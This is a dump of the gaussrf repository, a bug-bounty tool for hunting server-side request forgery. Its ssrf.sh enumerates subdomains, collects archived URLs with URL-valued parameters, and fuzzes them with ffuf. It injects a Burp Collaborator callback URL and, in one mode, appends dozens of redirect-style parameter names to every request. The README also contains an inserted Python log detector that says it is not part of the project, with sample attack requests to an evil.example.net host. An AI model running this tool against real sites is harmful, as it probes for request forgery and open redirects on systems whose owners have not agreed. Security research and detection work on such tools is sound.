Repository: KathanP19/gaussrf
Branch: master
Commit: efd399dec7bd
Files: 4
Total size: 9.8 KB

Directory structure:
gitextract_310b9q4y/
├── README.md
├── burp.txt
├── install.sh
└── ssrf.sh

================================================
FILE CONTENTS
================================================

================================================
FILE: README.md
================================================
# gaussrf

**This project is now discontinued and is no longer maintained.**

```
  ____________________ __    ________________________________ __
 __  ____/__    |_  / / /    __  ___/_  ___/__  __ \__  ____/
 _  / __ __  /| |  / / /     _____ \_____ \__  /_/ /_  /_
 / /_/ / _  ___ / /_/ /      ____/ /____/ /_  _, _/_  __/
 \____/  /_/  |_\____/       /____/ /____/ /_/ |_| /_/
```

Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl, and filter the URLs for open-redirection or SSRF parameters.

This tool was built for the Null Ahmedabad talk [Deep Dive into SSRF](https://null.co.in/event_sessions/3086-deep-dive-into-ssrf); the slides are available from that link.

## Prerequisites

* [GetAllUrls](https://github.com/lc/gau) - for fetching URLs
* [Assetfinder](https://github.com/tomnomnom/assetfinder) - for subdomain enumeration
* [Drishti](https://github.com/devanshbatham/Drishti) - for checking whether a URL is live

You can now use install.sh to install the required tools. These tools are written in Go, so Go must be installed on your system; don't forget to set your Go path properly.
```bash
$ sudo chmod +x install.sh
$ ./install.sh
```

### Installation

```bash
$ git clone https://github.com/KathanP19/gaussrf.git
$ cd gaussrf/
$ sudo chmod +x ssrf.sh
```

### Usage

Don't forget to put your blind SSRF testing link or Burp Collaborator link in `burp.txt`; if you don't have Burp Pro you can use the site [SSRFTest](https://ssrftest.com/) instead.

```
  ____________________ __    ________________________________ __
 __  ____/__    |_  / / /    __  ___/_  ___/__  __ \__  ____/
 _  / __ __  /| |  / / /     _____ \_____ \__  /_/ /_  /_
 / /_/ / _  ___ / /_/ /      ____/ /____/ /_  _, _/_  __/
 \____/  /_/  |_\____/       /____/ /____/ /_/ |_| /_/

Usage: For using directly, where subdomains will be found using Assetfinder
   ./ssrf.sh -d domain.com
   ./ssrf.sh -d domain.com -o output_directory
   ./ssrf.sh -d domain.com -ap
   ./ssrf.sh -d domain.com -o output_directory -ap

Usage: For using a list of subdomains
   ./ssrf.sh -l subdomains.txt
   ./ssrf.sh -l subdomains.txt -o output_directory
   ./ssrf.sh -l subdomains.txt -ap
   ./ssrf.sh -l subdomains.txt -o output_directory -ap
```

```
Options are as follows
-d  for directly letting assetfinder handle the subdomain part
-l  for using a list of subdomains
-o  for declaring the output directory
-ap for using the parameter appending feature
```

## Credits:

Thanks @tomnomnom for [Assetfinder](https://github.com/tomnomnom)!
Thanks @devanshbatham for [Drishti](https://github.com/devanshbatham/Drishti)!
Thanks @lc for [GAU](https://github.com/lc/gau)!
Thanks @hussein98d for the parameter appending feature.

### TODO list

~~Integrate [ffuf](https://github.com/ffuf/ffuf) to fuzz params with burp collab url.~~
~~Add option for the user to add their own subdomain list.~~

## Contributors

[@iNoSec2](https://github.com/iNoSec2) for adding the output option.
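The README above describes the tool from the tester's side: URLs whose query parameters carry another URL are collected, and in `-ap` mode a fixed set of parameter names (`dest`, `redirect`, `uri`, `url`, ...) is appended to every request, each set to the same callback URL. The following is an added example, not part of gaussrf, showing what the same activity looks like from the application owner's side: a small Python detector that reads web-server access-log lines (constructed sample lines, not real traffic), flags any query parameter whose value is an absolute URL pointing at a host outside an allowlist, and separately flags the mass-append footprint (many of those well-known parameter names in one request, all pointing at one external host). `ALLOWED_HOSTS`, `MASS_APPEND_THRESHOLD` and the log format are assumptions to adapt to your environment; the parameter-name list is the one in the script's `sed` command.

```python
"""Added detection example (not part of gaussrf): find requests in access logs
that carry external URLs in query parameters, and the mass-parameter-append
pattern that ssrf.sh's -ap mode produces."""
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names appended by ssrf.sh in -ap mode (copied from its sed command).
APPENDED_PARAMS = {
    "dest", "redirect", "uri", "path", "continue", "url", "window", "next",
    "data", "reference", "site", "html", "val", "validate", "domain",
    "callback", "return", "page", "feed", "host", "port", "to", "out", "view",
    "dir", "show", "navigation", "open",
}

# Hosts the application is legitimately allowed to be pointed at
# (assumption: replace with your own allowlist).
ALLOWED_HOSTS = {"cdn.example.com", "api.example.com"}

# Combined/common log format: client ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Number of distinct appended names in one request before it counts as mass-append
# (assumption; tune to your traffic).
MASS_APPEND_THRESHOLD = 10


def url_valued_params(path):
    """Return (name, host) for each query parameter whose value is an absolute
    http(s) URL. parse_qsl percent-decodes values, so url=http%3A%2F%2F... is
    caught as well as the plain form."""
    found = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        try:
            parts = urlsplit(value)
        except ValueError:          # e.g. malformed IPv6 literal; not a usable URL
            continue
        if parts.scheme in ("http", "https") and parts.hostname:
            found.append((name, parts.hostname.lower()))
    return found


def analyse_line(line):
    """Classify one access-log line. Returns None if the line does not parse,
    otherwise a dict whose 'findings' list is empty when nothing is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, path, status = m.groups()
    external = [(n, h) for n, h in url_valued_params(path) if h not in ALLOWED_HOSTS]
    findings = []
    if external:
        findings.append("external-url-param:" + ",".join(f"{n}={h}" for n, h in external))
    # Mass-append footprint: many of the known names, all pointing at a single host.
    names = {n for n, _ in external if n in APPENDED_PARAMS}
    hosts = {h for n, h in external if n in APPENDED_PARAMS}
    if len(names) >= MASS_APPEND_THRESHOLD and len(hosts) == 1:
        findings.append(f"mass-append:{len(names)} params -> {next(iter(hosts))}")
    return {"client": client, "method": method, "path": path, "status": status, "findings": findings}


def scan(lines):
    """Run analyse_line over an iterable of log lines and return only the hits."""
    return [r for r in (analyse_line(l) for l in lines) if r and r["findings"]]


# Constructed sample log lines (not real traffic). Line 3 mimics a request produced
# by -ap mode: every known parameter name set to the same callback URL.
CB = "http://cb.example.net/"
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /img?src=https://cdn.example.com/a.png HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /fetch?url=http://evil.example.net/x HTTP/1.1" 200 88',
    '198.51.100.9 - - [10/Oct/2023:13:55:38 +0000] "GET /fetch?url=' + CB + '&dest=' + CB + '&redirect=' + CB
    + '&uri=' + CB + '&path=' + CB + '&continue=' + CB + '&next=' + CB + '&data=' + CB + '&site=' + CB
    + '&host=' + CB + '&to=' + CB + ' HTTP/1.1" 404 0',
    '198.51.100.9 - - [10/Oct/2023:13:55:39 +0000] "GET /search?q=http HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["status"], "; ".join(hit["findings"]))
```

Run against the sample, the first line is ignored because the only URL-valued parameter points at an allowlisted host, the second is flagged once (an external URL in `url=`), the third is flagged twice (external URL plus the mass-append signature with 11 names all pointing at `cb.example.net`), and the fourth is clean because `q=http` is not an absolute URL. Using `parse_qsl` rather than a `grep "=http"` style substring match means percent-encoded values are decoded before the check and values that merely contain the letters `http` are not false positives.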
================================================
FILE: burp.txt
================================================
http://[yourburpcollaburl]

================================================
FILE: install.sh
================================================
#!/bin/bash
echo "============================Installing Tools For GAUSSRF=========================="
echo " "

# Note: on Go 1.17 and later, `go get -u` no longer installs binaries;
# use `go install <module-path>@latest` for each tool instead.

##Install Assetfinder
echo -e "\nINSTALLING \e[31m[assetfinder]\e[0m"
go get -u github.com/tomnomnom/assetfinder
echo -e "\nINSTALLING ASSETFINDER \e[32mFINISH\e[0m"

##Install GAU
echo -e "\nINSTALLING \e[31m[GAU]\e[0m"
go get -u github.com/lc/gau
echo -e "\nINSTALLING GAU \e[32mFINISH\e[0m"

##Installing Drishti (cloned into the current directory; ssrf.sh expects ./Drishti)
echo -e "\nINSTALLING \e[31m[Drishti]\e[0m"
git clone https://github.com/devanshbatham/Drishti
cd Drishti
pip3 install -r requirements.txt
rm raw_urls.txt
cd ..
echo -e "\nINSTALLING Drishti \e[32mFINISH\e[0m"

##Install qsreplace
echo -e "\nINSTALLING \e[31m[QSreplace]\e[0m"
go get -u github.com/tomnomnom/qsreplace
echo -e "\nINSTALLING Qsreplace \e[32mFINISH\e[0m"

##Install ffuf
echo -e "\nINSTALLING \e[31m[FFUF]\e[0m"
go get github.com/ffuf/ffuf
echo -e "\nINSTALLING FFUF \e[32mFINISH\e[0m"

echo "=============================Done Installing Tools================================="

================================================
FILE: ssrf.sh
================================================
#!/bin/bash
red=`tput setaf 1`
reset=`tput sgr0`

logo(){
echo "${red}
  ____________________ __    ________________________________ __
 __  ____/__    |_  / / /    __  ___/_  ___/__  __ \__  ____/
 _  / __ __  /| |  / / /     _____ \_____ \__  /_/ /_  /_
 / /_/ / _  ___ / /_/ /      ____/ /____/ /_  _, _/_  __/
 \____/  /_/  |_\____/       /____/ /____/ /_/ |_| /_/
${reset}"
}

subs(){
    logo
    ##Getting SubDomains
    echo -e "\nRUNNING \e[31m[assetfinder]\e[0m"
    assetfinder --subs-only $domain > $output_directory/$domain/$domain.assetfinder.txt
    cat $output_directory/$domain/$domain.assetfinder.txt | sort -u > $output_directory/$domain/subs.txt
    echo "FOUND SUBDOMAINS [$(cat $output_directory/$domain/subs.txt | wc -l)]"
    echo -e "RUNNING ASSETFINDER \e[32mFINISH\e[0m"
}

list(){
    logo
    ##Use the user-supplied subdomain list instead of running assetfinder
    echo "Using the supplied list of subdomains"
    cp $param $output_directory/$domain/subs.txt
}

recon(){
    ##Starting GETALLURLS
    echo -e "\nRUNNING \e[31m[GAU]\e[0m"
    cat $output_directory/$domain/subs.txt | gau > $output_directory/$domain/$domain.urls.txt
    echo -e "RUNNING GAU \e[32mFINISH\e[0m"
    echo "${red} ---------------COLLECTED URLS OF SUBDOMAINS--------------- ${reset}"

    ##Filter Urls to check with drishti: keep only URLs with a parameter whose value starts with "http"
    echo -e "\n\e[31m[Filtering Urls with params]\e[0m"
    cat $output_directory/$domain/$domain.urls.txt | grep "=http" | tee $output_directory/$domain/$domain.urls_with_params.txt
    echo -e "Filtering Urls with params completed \e[32mFINISH\e[0m"

    ##Cleaning the list for urls: Drishti reads ./Drishti/raw_urls.txt and writes Results-200.txt
    echo -e "\nChecking for Live Urls \e[31m[LIST]\e[0m"
    cp $output_directory/$domain/$domain.urls_with_params.txt ./Drishti/
    mv ./Drishti/$domain.urls_with_params.txt ./Drishti/raw_urls.txt
    cd ./Drishti
    python3 drishti.py
    cd ..
    cp ./Drishti/Results-200.txt $output_directory/$domain/
    rm ./Drishti/raw_urls.txt
    echo "FOUND POSSIBLE SSRF URLS [$(cat $output_directory/$domain/Results-200.txt | wc -l)]"
    echo -e "Checking for Live Urls \e[32mFINISH\e[0m"

    ##FUZZ: replace every parameter value with the FUZZ keyword, then let ffuf fill in the burp.txt URL
    echo -e "\nHope You Have Added Burp Collab Url In burp.txt Fuzzing\e[31m[LIST]\e[0m"
    cat $output_directory/$domain/Results-200.txt | qsreplace FUZZ > $output_directory/$domain/fuzzable.txt
    ffuf -w "$output_directory/$domain/fuzzable.txt:URL" -w burp.txt -u URLFUZZ -v
    echo "${red} --------------DONE---------------- ${reset}"
}

param(){
    echo -e "\n\e[31m[Making List of Appended SSRF Params And Fire Them]\e[0m"
    ser=`cat burp.txt`
    cat $output_directory/$domain/Results-200.txt | sort | uniq | grep "?" | qsreplace -a | qsreplace $ser > $output_directory/$domain/appended_params.txt
    ##Append every candidate parameter name, each set to the callback URL, to the end of each line
    ##(sed replacement uses "|" as delimiter; "\&" is a literal ampersand)
    sed -i "s|$|\&dest=$ser\&redirect=$ser\&uri=$ser\&path=$ser\&continue=$ser\&url=$ser\&window=$ser\&next=$ser\&data=$ser\&reference=$ser\&site=$ser\&html=$ser\&val=$ser\&validate=$ser\&domain=$ser\&callback=$ser\&return=$ser\&page=$ser\&feed=$ser\&host=$ser\&port=$ser\&to=$ser\&out=$ser\&view=$ser\&dir=$ser\&show=$ser\&navigation=$ser\&open=$ser|g" $output_directory/$domain/appended_params.txt
    echo -e "\nTOTAL NUMBER OF URLS APPENDED WITH PARAMS [$(cat $output_directory/$domain/appended_params.txt | wc -l)]"
    echo "${red}-----------------------Check Your Server for Potential Callbacks------------------------- ${reset}"
    ffuf -w $output_directory/$domain/appended_params.txt -u FUZZ -t 50
    echo "${red} --------------DONE---------------- ${reset}"
}

killit(){
    logo
    echo "Usage: For Using directly which will find domains using Assetfinder"
    echo "   ./ssrf.sh -d domain.com"
    echo "   ./ssrf.sh -d domain.com -o output_directory"
    echo "   ./ssrf.sh -d domain.com -ap"
    echo "   ./ssrf.sh -d domain.com -o output_directory -ap"
    echo " "
    echo "Usage: For Using list of Subdomains"
    echo "   ./ssrf.sh -l subdomains.txt"
    echo "   ./ssrf.sh -l subdomains.txt -o output_directory"
    echo "   ./ssrf.sh -l subdomains.txt -ap"
    echo "   ./ssrf.sh -l subdomains.txt -o output_directory -ap"
    exit 1
}

if [ -z "$1" ];then
    killit
else
    while [ -n "$1" ]; do
        case "$1" in
        -d)
            domain="$2"
            ##Options are positional: -o must be given as $3 (with its directory as $4) and -ap as $5
            if [[ $3 == '-o' && $5 == "-ap" ]];then
                output_directory="$4/gaussrf/recon/"
                mkdir -p "$output_directory"/"$domain"
                subs $domain
                recon $domain
                param $domain
            elif [[ $3 == "-o" ]]; then
                output_directory="$4/gaussrf/recon/"
                mkdir -p "$output_directory"/"$domain"
                subs $domain
                recon $domain
            elif [[ $3 == "-ap" ]]; then
                output_directory="recon"
                mkdir -p "$output_directory"/"$domain"
                subs $domain
                recon $domain
                param $domain
            else
                output_directory="recon"
                mkdir -p "$output_directory"/"$domain"
                subs $domain
                recon $domain
            fi
            shift
            break
            ;;
        -l)
            param="$2"
            echo -n "What is your target name : "
            read domain
            if [[ $3 == '-o' && $5 == "-ap" ]];then
                output_directory="$4/gaussrf/recon/"
                mkdir -p "$output_directory"/"$domain"
                list
                recon $domain
                param $domain
            elif [[ $3 == "-o" ]]; then
                output_directory="$4/gaussrf/recon/"
                mkdir -p "$output_directory"/"$domain"
                list
                recon $domain
            elif [[ $3 == "-ap" ]]; then
                output_directory="recon"
                mkdir -p "$output_directory"/"$domain"
                list
                recon $domain
                param $domain
            else
                output_directory="recon"
                mkdir -p "$output_directory"/"$domain"
                list
                recon $domain
            fi
            shift
            break
            ;;
        *)
            echo "Option $1 not recognized"
            ;;
        esac
        shift
    done
fi